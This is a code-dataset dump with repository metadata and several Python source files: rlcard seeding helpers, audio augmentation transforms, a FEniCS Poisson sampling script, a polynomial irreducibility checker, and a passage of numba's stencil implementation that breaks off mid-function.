hexsha
stringlengths
40
40
size
int64
5
2.06M
ext
stringclasses
10 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
3
248
max_stars_repo_name
stringlengths
5
125
max_stars_repo_head_hexsha
stringlengths
40
78
max_stars_repo_licenses
sequencelengths
1
10
max_stars_count
int64
1
191k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
3
248
max_issues_repo_name
stringlengths
5
125
max_issues_repo_head_hexsha
stringlengths
40
78
max_issues_repo_licenses
sequencelengths
1
10
max_issues_count
int64
1
67k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
3
248
max_forks_repo_name
stringlengths
5
125
max_forks_repo_head_hexsha
stringlengths
40
78
max_forks_repo_licenses
sequencelengths
1
10
max_forks_count
int64
1
105k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
5
2.06M
avg_line_length
float64
1
1.02M
max_line_length
int64
3
1.03M
alphanum_fraction
float64
0
1
count_classes
int64
0
1.6M
score_classes
float64
0
1
count_generators
int64
0
651k
score_generators
float64
0
1
count_decorators
int64
0
990k
score_decorators
float64
0
1
count_async_functions
int64
0
235k
score_async_functions
float64
0
1
count_documentation
int64
0
1.04M
score_documentation
float64
0
1
4c2d9f91e47f374b558a37fc891829c105809bba
4,714
py
Python
rlcard/utils/seeding.py
AdrianP-/rlcard
5b99dc8faa4c97ecac2d1189967b90c45d79624b
[ "MIT" ]
null
null
null
rlcard/utils/seeding.py
AdrianP-/rlcard
5b99dc8faa4c97ecac2d1189967b90c45d79624b
[ "MIT" ]
null
null
null
rlcard/utils/seeding.py
AdrianP-/rlcard
5b99dc8faa4c97ecac2d1189967b90c45d79624b
[ "MIT" ]
null
null
null
#The MIT License # #Copyright (c) 2020 DATA Lab at Texas A&M University #Copyright (c) 2016 OpenAI (https://openai.com) # #Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: # #The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. # #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. import hashlib import numpy as np import os import struct def colorize(string, color, bold=False, highlight = False): """Return string surrounded by appropriate terminal color codes to print colorized text. Valid colors: gray, red, green, yellow, blue, magenta, cyan, white, crimson """ attr = [] num = color2num[color] if highlight: num += 10 attr.append(str(num)) if bold: attr.append('1') attrs = ';'.join(attr) return '\x1b[%sm%s\x1b[0m' % (attrs, string) def error(msg, *args): print(colorize('%s: %s'%('ERROR', msg % args), 'red')) def np_random(seed=None): if seed is not None and not (isinstance(seed, int) and 0 <= seed): raise error.Error('Seed must be a non-negative integer or omitted, not {}'.format(seed)) seed = create_seed(seed) rng = np.random.RandomState() rng.seed(_int_list_from_bigint(hash_seed(seed))) return rng, seed def hash_seed(seed=None, max_bytes=8): """Any given evaluation is likely to have many PRNG's active at once. (Most commonly, because the environment is running in multiple processes.) There's literature indicating that having linear correlations between seeds of multiple PRNG's can correlate the outputs: http://blogs.unity3d.com/2015/01/07/a-primer-on-repeatable-random-numbers/ http://stackoverflow.com/questions/1554958/how-different-do-random-seeds-need-to-be http://dl.acm.org/citation.cfm?id=1276928 Thus, for sanity we hash the seeds before using them. (This scheme is likely not crypto-strength, but it should be good enough to get rid of simple correlations.) Args: seed (Optional[int]): None seeds from an operating system specific randomness source. max_bytes: Maximum number of bytes to use in the hashed seed. """ if seed is None: seed = create_seed(max_bytes=max_bytes) hash = hashlib.sha512(str(seed).encode('utf8')).digest() return _bigint_from_bytes(hash[:max_bytes]) def create_seed(a=None, max_bytes=8): """Create a strong random seed. Otherwise, Python 2 would seed using the system time, which might be non-robust especially in the presence of concurrency. Args: a (Optional[int, str]): None seeds from an operating system specific randomness source. max_bytes: Maximum number of bytes to use in the seed. """ # Adapted from https://svn.python.org/projects/python/tags/r32/Lib/random.py if a is None: a = _bigint_from_bytes(os.urandom(max_bytes)) elif isinstance(a, str): a = a.encode('utf8') a += hashlib.sha512(a).digest() a = _bigint_from_bytes(a[:max_bytes]) elif isinstance(a, int): a = a % 2**(8 * max_bytes) else: raise error.Error('Invalid type for seed: {} ({})'.format(type(a), a)) return a # TODO: don't hardcode sizeof_int here def _bigint_from_bytes(bytes): sizeof_int = 4 padding = sizeof_int - len(bytes) % sizeof_int bytes += b'\0' * padding int_count = int(len(bytes) / sizeof_int) unpacked = struct.unpack("{}I".format(int_count), bytes) accum = 0 for i, val in enumerate(unpacked): accum += 2 ** (sizeof_int * 8 * i) * val return accum def _int_list_from_bigint(bigint): # Special case 0 if bigint < 0: raise error.Error('Seed must be non-negative, not {}'.format(bigint)) elif bigint == 0: return [0] ints = [] while bigint > 0: bigint, mod = divmod(bigint, 2 ** 32) ints.append(mod) return ints
41.350877
461
0.694103
0
0
0
0
0
0
0
0
2,836
0.601612
4c2f421ab198ddb3faa7c72a6c2f2f1822a0634f
8,573
py
Python
ops/transforms.py
ex4sperans/freesound-classification
71b9920ce0ae376aa7f1a3a2943f0f92f4820813
[ "Apache-2.0" ]
55
2019-06-30T02:36:10.000Z
2021-12-07T07:24:42.000Z
ops/transforms.py
ex4sperans/freesound-classification
71b9920ce0ae376aa7f1a3a2943f0f92f4820813
[ "Apache-2.0" ]
13
2020-01-28T22:48:34.000Z
2022-03-11T23:50:36.000Z
ops/transforms.py
ex4sperans/freesound-classification
71b9920ce0ae376aa7f1a3a2943f0f92f4820813
[ "Apache-2.0" ]
7
2019-07-21T15:54:16.000Z
2020-07-22T13:02:37.000Z
import random import math from functools import partial import json import pysndfx import librosa import numpy as np import torch from ops.audio import ( read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout ) SAMPLE_RATE = 44100 class Augmentation: """A base class for data augmentation transforms""" pass class MapLabels: def __init__(self, class_map, drop_raw=True): self.class_map = class_map def __call__(self, dataset, **inputs): labels = np.zeros(len(self.class_map), dtype=np.float32) for c in inputs["raw_labels"]: labels[self.class_map[c]] = 1.0 transformed = dict(inputs) transformed["labels"] = labels transformed.pop("raw_labels") return transformed class MixUp(Augmentation): def __init__(self, p): self.p = p def __call__(self, dataset, **inputs): transformed = dict(inputs) if np.random.uniform() < self.p: first_audio, first_labels = inputs["audio"], inputs["labels"] random_sample = dataset.random_clean_sample() new_audio, new_labels = mix_audio_and_labels( first_audio, random_sample["audio"], first_labels, random_sample["labels"] ) transformed["audio"] = new_audio transformed["labels"] = new_labels return transformed class FlipAudio(Augmentation): def __init__(self, p): self.p = p def __call__(self, dataset, **inputs): transformed = dict(inputs) if np.random.uniform() < self.p: transformed["audio"] = np.flipud(inputs["audio"]) return transformed class AudioAugmentation(Augmentation): def __init__(self, p): self.p = p def __call__(self, dataset, **inputs): transformed = dict(inputs) if np.random.uniform() < self.p: effects_chain = ( pysndfx.AudioEffectsChain() .reverb( reverberance=random.randrange(50), room_scale=random.randrange(50), stereo_depth=random.randrange(50) ) .pitch(shift=random.randrange(-300, 300)) .overdrive(gain=random.randrange(2, 10)) .speed(random.uniform(0.9, 1.1)) ) transformed["audio"] = effects_chain(inputs["audio"]) return transformed class LoadAudio: def __init__(self): pass def __call__(self, dataset, **inputs): audio, sr = read_audio(inputs["filename"]) transformed = dict(inputs) transformed["audio"] = audio transformed["sr"] = sr return transformed class STFT: eps = 1e-4 def __init__(self, n_fft, hop_size): self.n_fft = n_fft self.hop_size = hop_size def __call__(self, dataset, **inputs): stft = compute_stft( inputs["audio"], window_size=self.n_fft, hop_size=self.hop_size, eps=self.eps) transformed = dict(inputs) transformed["stft"] = np.transpose(stft) return transformed class AudioFeatures: eps = 1e-4 def __init__(self, descriptor, verbose=True): name, *args = descriptor.split("_") self.feature_type = name if name == "stft": n_fft, hop_size = args self.n_fft = int(n_fft) self.hop_size = int(hop_size) self.n_features = self.n_fft // 2 + 1 self.padding_value = 0.0 if verbose: print( "\nUsing STFT features with params:\n", "n_fft: {}, hop_size: {}".format( n_fft, hop_size ) ) elif name == "mel": n_fft, hop_size, n_mel = args self.n_fft = int(n_fft) self.hop_size = int(hop_size) self.n_mel = int(n_mel) self.n_features = self.n_mel self.padding_value = 0.0 if verbose: print( "\nUsing mel features with params:\n", "n_fft: {}, hop_size: {}, n_mel: {}".format( n_fft, hop_size, n_mel ) ) elif name == "raw": self.n_features = 1 self.padding_value = 0.0 if verbose: print( "\nUsing raw waveform features." ) def __call__(self, dataset, **inputs): transformed = dict(inputs) if self.feature_type == "stft": # stft = compute_stft( # inputs["audio"], # window_size=self.n_fft, hop_size=self.hop_size, # eps=self.eps, log=True # ) transformed["signal"] = np.expand_dims(inputs["audio"], -1) elif self.feature_type == "mel": stft = compute_stft( inputs["audio"], window_size=self.n_fft, hop_size=self.hop_size, eps=self.eps, log=False ) transformed["signal"] = np.expand_dims(inputs["audio"], -1) elif self.feature_type == "raw": transformed["signal"] = np.expand_dims(inputs["audio"], -1) return transformed class SampleSegment(Augmentation): def __init__(self, ratio=(0.3, 0.9), p=1.0): self.min, self.max = ratio self.p = p def __call__(self, dataset, **inputs): transformed = dict(inputs) if np.random.uniform() < self.p: original_size = inputs["audio"].size target_size = int(np.random.uniform(self.min, self.max) * original_size) start = np.random.randint(original_size - target_size - 1) transformed["audio"] = inputs["audio"][start:start+target_size] return transformed class ShuffleAudio(Augmentation): def __init__(self, chunk_length=0.5, p=0.5): self.chunk_length = chunk_length self.p = p def __call__(self, dataset, **inputs): transformed = dict(inputs) if np.random.uniform() < self.p: transformed["audio"] = shuffle_audio( transformed["audio"], self.chunk_length, sr=transformed["sr"]) return transformed class CutOut(Augmentation): def __init__(self, area=0.25, p=0.5): self.area = area self.p = p def __call__(self, dataset, **inputs): transformed = dict(inputs) if np.random.uniform() < self.p: transformed["audio"] = cutout( transformed["audio"], self.area) return transformed class SampleLongAudio: def __init__(self, max_length): self.max_length = max_length def __call__(self, dataset, **inputs): transformed = dict(inputs) if (inputs["audio"].size / inputs["sr"]) > self.max_length: max_length = self.max_length * inputs["sr"] start = np.random.randint(0, inputs["audio"].size - max_length) transformed["audio"] = inputs["audio"][start:start+max_length] return transformed class OneOf: def __init__(self, transforms): self.transforms = transforms def __call__(self, dataset, **inputs): transform = random.choice(self.transforms) return transform(**inputs) class DropFields: def __init__(self, fields): self.to_drop = fields def __call__(self, dataset, **inputs): transformed = dict() for name, input in inputs.items(): if not name in self.to_drop: transformed[name] = input return transformed class RenameFields: def __init__(self, mapping): self.mapping = mapping def __call__(self, dataset, **inputs): transformed = dict(inputs) for old, new in self.mapping.items(): transformed[new] = transformed.pop(old) return transformed class Compose: def __init__(self, transforms): self.transforms = transforms def switch_off_augmentations(self): for t in self.transforms: if isinstance(t, Augmentation): t.p = 0.0 def __call__(self, dataset=None, **inputs): for t in self.transforms: inputs = t(dataset=dataset, **inputs) return inputs class Identity: def __call__(self, dataset=None, **inputs): return inputs
22.679894
84
0.561647
8,253
0.962674
0
0
0
0
0
0
662
0.077219
4c30506aa8598c0388ff7d67c1b22762e60080e5
2,011
py
Python
figures/pp.py
mathematicalmichael/thesis
2906b10f94960c3e75bdb48e5b8b583f59b9441e
[ "MIT" ]
6
2019-04-24T08:05:49.000Z
2020-12-28T20:34:29.000Z
figures/pp.py
mathematicalmichael/thesis
2906b10f94960c3e75bdb48e5b8b583f59b9441e
[ "MIT" ]
59
2019-12-27T23:15:05.000Z
2021-11-24T17:52:57.000Z
figures/pp.py
mathematicalmichael/thesis
2906b10f94960c3e75bdb48e5b8b583f59b9441e
[ "MIT" ]
null
null
null
#!/usr/env/bin python import os # os.environ['OMP_NUM_THREADS'] = '1' from newpoisson import poisson import numpy as np from fenics import set_log_level, File, RectangleMesh, Point mesh = RectangleMesh(Point(0,0), Point(1,1), 36, 36) # comm = mesh.mpi_comm() set_log_level(40) # ERROR=40 # from mpi4py import MPI # comm = MPI.COMM_WORLD # rank = comm.Get_rank() if __name__=='__main__': import argparse parser = argparse.ArgumentParser(description="Poisson Problem") parser.add_argument('-n', '--num', default = 10, type=int, help="Number of samples") parser.add_argument('-o', '--outfile', default='results', help="Output filename (no extension)") parser.add_argument('-i', '--input-dim', default=1, type=int) parser.add_argument('-d', '--dist', default='u', help='Distribution. `n` (normal), `u` (uniform, default)') args = parser.parse_args() num_samples = args.num dist = args.dist outfile = args.outfile.replace('.pkl','') inputdim = args.input_dim if inputdim == 1: # U[1,5] randsamples = 1 + 4*np.random.rand(num_samples) else: # N(0,1) if dist == 'n': randsamples = np.random.randn(num_samples, inputdim) elif dist == 'u': randsamples = -4*np.random.rand(num_samples, inputdim) else: raise ValueError("Improper distribution choice, use `n` (normal), `u` (uniform)") sample_seed_list = list(zip(range(num_samples), randsamples)) def wrapper(sample, outfile): g=sample[1] u = poisson(gamma=g, mesh=mesh) # Save solution fname = f"{outfile}-data/poisson-{int(sample[0]):06d}.xml" File(fname, 'w') << u return {int(sample[0]): {'u': fname, 'gamma': sample[1]}} results = [] for sample in sample_seed_list: r = wrapper(sample, outfile) results.append(r) # print(results) import pickle pickle.dump(results, open(f'{outfile}.pkl','wb'))
32.967213
111
0.61462
0
0
0
0
0
0
0
0
576
0.286425
4c308137f6fcaffcc096aaa674f08780ed2a8ef7
3,606
py
Python
additions/irreducible_check.py
kluhan/seraphim
412b693effb15f80d348d6d885d7c781774bb8aa
[ "MIT" ]
null
null
null
additions/irreducible_check.py
kluhan/seraphim
412b693effb15f80d348d6d885d7c781774bb8aa
[ "MIT" ]
null
null
null
additions/irreducible_check.py
kluhan/seraphim
412b693effb15f80d348d6d885d7c781774bb8aa
[ "MIT" ]
null
null
null
""" Irreduzibilitätskriterien Implementiert wurden das Eisenstein- und das Perronkriterium Quellen: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf Übergeben werden Polynome vom Typ Polynomial, keine direkten Listen von Koeffizienten """ import logging import helper import itertools def factor(n): # Faktorisierung einer Zahl n i = 0 factors = [] for i in range(1, n + 1): if n % i == 0: factors.append(i) return factors def prime_factor(n): # Primfaktorzerlegung einer Zahl n i = 2 factors = [] while i * i <= n: if n % i: i += 1 else: n //= i factors.append(i) if n > 1: factors.append(n) return factors # rekursive Implementierung von HCF def hcf(x, y): """Highest common factor""" if y == 0: return x else: return hcf(y, x % y) def is_polynomial_coprime(polynomial): """Überprüft, ob ein Polynom teilerfremd (coprime) ist""" non_zero_polynomial = [ i for i in polynomial.coefficients if i != 0 ] # Nullen würden Ergebnis von HCF verfälschen if polynomial.degree() == 0: return True for x, y in itertools.combinations(non_zero_polynomial, 2): if hcf(x, y) != 1: return False return True # Quelle: https://rms.unibuc.ro/bulletin/pdf/53-3/perron.pdf def is_irreducible_perron(polynomial): """ Prüft ein Polynom auf Irreduzierbarkeit (Perron). Führender Koeffizient != 1 funktioniert nicht. Keine Aussage möglich, wenn vorletzer Koeffizient kleiner ist als die absolute Summe der restlichen Koeffizienten """ if polynomial.degree() < 0: return logging.error("Polynom ungültig") const_coefficient = polynomial.coefficients[0] if const_coefficient == 0: return 0 lead_coefficient = polynomial.coefficients[polynomial.degree()] assert lead_coefficient == 1 nm1_coefficient = abs(polynomial.coefficients[polynomial.degree() - 1]) total = 1 i = 0 for coeff in polynomial.coefficients: if i < polynomial.degree() - 1: total += abs(coeff) i = i + 1 if nm1_coefficient > total: return 1 return 2 # Quellen: https://www.uni-frankfurt.de/81429607/Stix_Algebra_SkriptWS2016_17.pdf # http://math-www.uni-paderborn.de/~chris/Index33/V/par5.pdf def is_irreducible_eisenstein(polynomial): """ Eine Implementierung des Eisensteinkriteriums. """ # Polynom muss einen Grad m >= 1 haben if polynomial.degree() < 1: return 2 # Voraussetzung für Eisenstein sind teilerfremde Koeffizienten if helper.is_polynomial_coprime(polynomial is False): return 2 # Prüfe, ob es eine Primzahl gibt, die alle Koeffizienten des Polynoms bis Grad m - 1 teilt. p^2 darf a0 nicht teilen const_coeff = polynomial.coefficients[0] if const_coeff == 0: return 0 # Erhalte Primfaktorzerlegung der Konstante, um Grundlage von Primzahlen zu erhalten prime_factors = helper.prime_factor(const_coeff) for p in prime_factors: if ( const_coeff % pow(p, 2) != 0 ): # teilt p^2 den konstanten Koeffizienten, dann kann keine Aussage getroffen werden return 2 for coeff in polynomial.coefficients[0 : polynomial.degree() - 1]: if coeff % p != 0: return 2 # teilt die Primzahl den Koeffizienten nicht, kann keine Aussage getroffen werden return 1
27.112782
121
0.646977
0
0
0
0
0
0
0
0
1,549
0.428137
4c30bd2dd03a5aeb1d8422cd8b6cb2d539652200
39,763
py
Python
numba/stencils/stencil.py
auderson/numba
3d67c9850ab56457f418cf40af6245fd9c337705
[ "BSD-2-Clause" ]
6,620
2015-01-04T08:51:04.000Z
2022-03-31T12:52:18.000Z
numba/stencils/stencil.py
auderson/numba
3d67c9850ab56457f418cf40af6245fd9c337705
[ "BSD-2-Clause" ]
6,457
2015-01-04T03:18:41.000Z
2022-03-31T17:38:42.000Z
numba/stencils/stencil.py
auderson/numba
3d67c9850ab56457f418cf40af6245fd9c337705
[ "BSD-2-Clause" ]
930
2015-01-25T02:33:03.000Z
2022-03-30T14:10:32.000Z
# # Copyright (c) 2017 Intel Corporation # SPDX-License-Identifier: BSD-2-Clause # import copy import numpy as np from llvmlite import ir as lir from numba.core import types, typing, utils, ir, config, ir_utils, registry from numba.core.typing.templates import (CallableTemplate, signature, infer_global, AbstractTemplate) from numba.core.imputils import lower_builtin from numba.core.extending import register_jitable from numba.core.errors import NumbaValueError from numba.misc.special import literal_unroll import numba import operator from numba.np import numpy_support class StencilFuncLowerer(object): '''Callable class responsible for lowering calls to a specific StencilFunc. ''' def __init__(self, sf): self.stencilFunc = sf def __call__(self, context, builder, sig, args): cres = self.stencilFunc.compile_for_argtys(sig.args, {}, sig.return_type, None) res = context.call_internal(builder, cres.fndesc, sig, args) context.add_linking_libs([cres.library]) return res @register_jitable def raise_if_incompatible_array_sizes(a, *args): ashape = a.shape # We need literal_unroll here because the stencil might take # multiple input arrays with different types that are not compatible # (e.g. values as float[:] and flags as bool[:]) # When more than three total arrays are given, the second and third # are iterated over in the loop below. Without literal_unroll, their # types have to match. # An example failing signature without literal_unroll might be # (float[:], float[:], bool[:]) (Just (float[:], bool[:]) wouldn't fail) for arg in literal_unroll(args): if a.ndim != arg.ndim: raise ValueError("Secondary stencil array does not have same number " " of dimensions as the first stencil input.") argshape = arg.shape for i in range(len(ashape)): if ashape[i] > argshape[i]: raise ValueError("Secondary stencil array has some dimension " "smaller the same dimension in the first " "stencil input.") def slice_addition(the_slice, addend): """ Called by stencil in Python mode to add the loop index to a user-specified slice. """ return slice(the_slice.start + addend, the_slice.stop + addend) class StencilFunc(object): """ A special type to hold stencil information for the IR. """ id_counter = 0 def __init__(self, kernel_ir, mode, options): self.id = type(self).id_counter type(self).id_counter += 1 self.kernel_ir = kernel_ir self.mode = mode self.options = options self.kws = [] # remember original kws arguments # stencils only supported for CPU context currently self._typingctx = registry.cpu_target.typing_context self._targetctx = registry.cpu_target.target_context self._typingctx.refresh() self._targetctx.refresh() self._install_type(self._typingctx) self.neighborhood = self.options.get("neighborhood") self._type_cache = {} self._lower_me = StencilFuncLowerer(self) def replace_return_with_setitem(self, blocks, index_vars, out_name): """ Find return statements in the IR and replace them with a SetItem call of the value "returned" by the kernel into the result array. Returns the block labels that contained return statements. """ ret_blocks = [] for label, block in blocks.items(): scope = block.scope loc = block.loc new_body = [] for stmt in block.body: if isinstance(stmt, ir.Return): ret_blocks.append(label) # If 1D array then avoid the tuple construction. if len(index_vars) == 1: rvar = ir.Var(scope, out_name, loc) ivar = ir.Var(scope, index_vars[0], loc) new_body.append(ir.SetItem(rvar, ivar, stmt.value, loc)) else: # Convert the string names of the index variables into # ir.Var's. var_index_vars = [] for one_var in index_vars: index_var = ir.Var(scope, one_var, loc) var_index_vars += [index_var] s_index_name = ir_utils.mk_unique_var("stencil_index") s_index_var = ir.Var(scope, s_index_name, loc) # Build a tuple from the index ir.Var's. tuple_call = ir.Expr.build_tuple(var_index_vars, loc) new_body.append(ir.Assign(tuple_call, s_index_var, loc)) rvar = ir.Var(scope, out_name, loc) # Write the return statements original value into # the array using the tuple index. si = ir.SetItem(rvar, s_index_var, stmt.value, loc) new_body.append(si) else: new_body.append(stmt) block.body = new_body return ret_blocks def add_indices_to_kernel(self, kernel, index_names, ndim, neighborhood, standard_indexed, typemap, calltypes): """ Transforms the stencil kernel as specified by the user into one that includes each dimension's index variable as part of the getitem calls. So, in effect array[-1] becomes array[index0-1]. """ const_dict = {} kernel_consts = [] if config.DEBUG_ARRAY_OPT >= 1: print("add_indices_to_kernel", ndim, neighborhood) ir_utils.dump_blocks(kernel.blocks) if neighborhood is None: need_to_calc_kernel = True else: need_to_calc_kernel = False if len(neighborhood) != ndim: raise ValueError("%d dimensional neighborhood specified for %d " \ "dimensional input array" % (len(neighborhood), ndim)) tuple_table = ir_utils.get_tuple_table(kernel.blocks) relatively_indexed = set() for block in kernel.blocks.values(): scope = block.scope loc = block.loc new_body = [] for stmt in block.body: if (isinstance(stmt, ir.Assign) and isinstance(stmt.value, ir.Const)): if config.DEBUG_ARRAY_OPT >= 1: print("remembering in const_dict", stmt.target.name, stmt.value.value) # Remember consts for use later. const_dict[stmt.target.name] = stmt.value.value if ((isinstance(stmt, ir.Assign) and isinstance(stmt.value, ir.Expr) and stmt.value.op in ['setitem', 'static_setitem'] and stmt.value.value.name in kernel.arg_names) or (isinstance(stmt, ir.SetItem) and stmt.target.name in kernel.arg_names)): raise ValueError("Assignments to arrays passed to stencil " \ "kernels is not allowed.") if (isinstance(stmt, ir.Assign) and isinstance(stmt.value, ir.Expr) and stmt.value.op in ['getitem', 'static_getitem'] and stmt.value.value.name in kernel.arg_names and stmt.value.value.name not in standard_indexed): # We found a getitem from the input array. if stmt.value.op == 'getitem': stmt_index_var = stmt.value.index else: stmt_index_var = stmt.value.index_var # allow static_getitem since rewrite passes are applied #raise ValueError("Unexpected static_getitem in add_indices_to_kernel.") relatively_indexed.add(stmt.value.value.name) # Store the index used after looking up the variable in # the const dictionary. if need_to_calc_kernel: assert hasattr(stmt_index_var, 'name') if stmt_index_var.name in tuple_table: kernel_consts += [tuple_table[stmt_index_var.name]] elif stmt_index_var.name in const_dict: kernel_consts += [const_dict[stmt_index_var.name]] else: raise NumbaValueError("stencil kernel index is not " "constant, 'neighborhood' option required") if ndim == 1: # Single dimension always has index variable 'index0'. # tmpvar will hold the real index and is computed by # adding the relative offset in stmt.value.index to # the current absolute location in index0. index_var = ir.Var(scope, index_names[0], loc) tmpname = ir_utils.mk_unique_var("stencil_index") tmpvar = ir.Var(scope, tmpname, loc) stmt_index_var_typ = typemap[stmt_index_var.name] # If the array is indexed with a slice then we # have to add the index value with a call to # slice_addition. if isinstance(stmt_index_var_typ, types.misc.SliceType): sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc) sa_func = numba.njit(slice_addition) sa_func_typ = types.functions.Dispatcher(sa_func) typemap[sa_var.name] = sa_func_typ g_sa = ir.Global("slice_addition", sa_func, loc) new_body.append(ir.Assign(g_sa, sa_var, loc)) slice_addition_call = ir.Expr.call(sa_var, [stmt_index_var, index_var], (), loc) calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [stmt_index_var_typ, types.intp], {}) new_body.append(ir.Assign(slice_addition_call, tmpvar, loc)) new_body.append(ir.Assign( ir.Expr.getitem(stmt.value.value, tmpvar, loc), stmt.target, loc)) else: acc_call = ir.Expr.binop(operator.add, stmt_index_var, index_var, loc) new_body.append(ir.Assign(acc_call, tmpvar, loc)) new_body.append(ir.Assign( ir.Expr.getitem(stmt.value.value, tmpvar, loc), stmt.target, loc)) else: index_vars = [] sum_results = [] s_index_name = ir_utils.mk_unique_var("stencil_index") s_index_var = ir.Var(scope, s_index_name, loc) const_index_vars = [] ind_stencils = [] stmt_index_var_typ = typemap[stmt_index_var.name] # Same idea as above but you have to extract # individual elements out of the tuple indexing # expression and add the corresponding index variable # to them and then reconstitute as a tuple that can # index the array. for dim in range(ndim): tmpname = ir_utils.mk_unique_var("const_index") tmpvar = ir.Var(scope, tmpname, loc) new_body.append(ir.Assign(ir.Const(dim, loc), tmpvar, loc)) const_index_vars += [tmpvar] index_var = ir.Var(scope, index_names[dim], loc) index_vars += [index_var] tmpname = ir_utils.mk_unique_var("ind_stencil_index") tmpvar = ir.Var(scope, tmpname, loc) ind_stencils += [tmpvar] getitemname = ir_utils.mk_unique_var("getitem") getitemvar = ir.Var(scope, getitemname, loc) getitemcall = ir.Expr.getitem(stmt_index_var, const_index_vars[dim], loc) new_body.append(ir.Assign(getitemcall, getitemvar, loc)) # Get the type of this particular part of the index tuple. if isinstance(stmt_index_var_typ, types.ConstSized): one_index_typ = stmt_index_var_typ[dim] else: one_index_typ = stmt_index_var_typ[:] # If the array is indexed with a slice then we # have to add the index value with a call to # slice_addition. if isinstance(one_index_typ, types.misc.SliceType): sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc) sa_func = numba.njit(slice_addition) sa_func_typ = types.functions.Dispatcher(sa_func) typemap[sa_var.name] = sa_func_typ g_sa = ir.Global("slice_addition", sa_func, loc) new_body.append(ir.Assign(g_sa, sa_var, loc)) slice_addition_call = ir.Expr.call(sa_var, [getitemvar, index_vars[dim]], (), loc) calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [one_index_typ, types.intp], {}) new_body.append(ir.Assign(slice_addition_call, tmpvar, loc)) else: acc_call = ir.Expr.binop(operator.add, getitemvar, index_vars[dim], loc) new_body.append(ir.Assign(acc_call, tmpvar, loc)) tuple_call = ir.Expr.build_tuple(ind_stencils, loc) new_body.append(ir.Assign(tuple_call, s_index_var, loc)) new_body.append(ir.Assign( ir.Expr.getitem(stmt.value.value,s_index_var,loc), stmt.target,loc)) else: new_body.append(stmt) block.body = new_body if need_to_calc_kernel: # Find the size of the kernel by finding the maximum absolute value # index used in the kernel specification. neighborhood = [[0,0] for _ in range(ndim)] if len(kernel_consts) == 0: raise NumbaValueError("Stencil kernel with no accesses to " "relatively indexed arrays.") for index in kernel_consts: if isinstance(index, tuple) or isinstance(index, list): for i in range(len(index)): te = index[i] if isinstance(te, ir.Var) and te.name in const_dict: te = const_dict[te.name] if isinstance(te, int): neighborhood[i][0] = min(neighborhood[i][0], te) neighborhood[i][1] = max(neighborhood[i][1], te) else: raise NumbaValueError( "stencil kernel index is not constant," "'neighborhood' option required") index_len = len(index) elif isinstance(index, int): neighborhood[0][0] = min(neighborhood[0][0], index) neighborhood[0][1] = max(neighborhood[0][1], index) index_len = 1 else: raise NumbaValueError( "Non-tuple or non-integer used as stencil index.") if index_len != ndim: raise NumbaValueError( "Stencil index does not match array dimensionality.") return (neighborhood, relatively_indexed) def get_return_type(self, argtys): if config.DEBUG_ARRAY_OPT >= 1: print("get_return_type", argtys) ir_utils.dump_blocks(self.kernel_ir.blocks) if not isinstance(argtys[0], types.npytypes.Array): raise NumbaValueError("The first argument to a stencil kernel must " "be the primary input array.") from numba.core import typed_passes typemap, return_type, calltypes, _ = typed_passes.type_inference_stage( self._typingctx, self._targetctx, self.kernel_ir, argtys, None, {}) if isinstance(return_type, types.npytypes.Array): raise NumbaValueError( "Stencil kernel must return a scalar and not a numpy array.") real_ret = types.npytypes.Array(return_type, argtys[0].ndim, argtys[0].layout) return (real_ret, typemap, calltypes) def _install_type(self, typingctx): """Constructs and installs a typing class for a StencilFunc object in the input typing context. """ _ty_cls = type('StencilFuncTyping_' + str(self.id), (AbstractTemplate,), dict(key=self, generic=self._type_me)) typingctx.insert_user_function(self, _ty_cls) def compile_for_argtys(self, argtys, kwtys, return_type, sigret): # look in the type cache to find if result array is passed (_, result, typemap, calltypes) = self._type_cache[argtys] new_func = self._stencil_wrapper(result, sigret, return_type, typemap, calltypes, *argtys) return new_func def _type_me(self, argtys, kwtys): """ Implement AbstractTemplate.generic() for the typing class built by StencilFunc._install_type(). Return the call-site signature. """ if (self.neighborhood is not None and len(self.neighborhood) != argtys[0].ndim): raise NumbaValueError("%d dimensional neighborhood specified " "for %d dimensional input array" % (len(self.neighborhood), argtys[0].ndim)) argtys_extra = argtys sig_extra = "" result = None if 'out' in kwtys: argtys_extra += (kwtys['out'],) sig_extra += ", out=None" result = kwtys['out'] if 'neighborhood' in kwtys: argtys_extra += (kwtys['neighborhood'],) sig_extra += ", neighborhood=None" # look in the type cache first if argtys_extra in self._type_cache: (_sig, _, _, _) = self._type_cache[argtys_extra] return _sig (real_ret, typemap, calltypes) = self.get_return_type(argtys) sig = signature(real_ret, *argtys_extra) dummy_text = ("def __numba_dummy_stencil({}{}):\n pass\n".format( ",".join(self.kernel_ir.arg_names), sig_extra)) exec(dummy_text) in globals(), locals() dummy_func = eval("__numba_dummy_stencil") sig = sig.replace(pysig=utils.pysignature(dummy_func)) 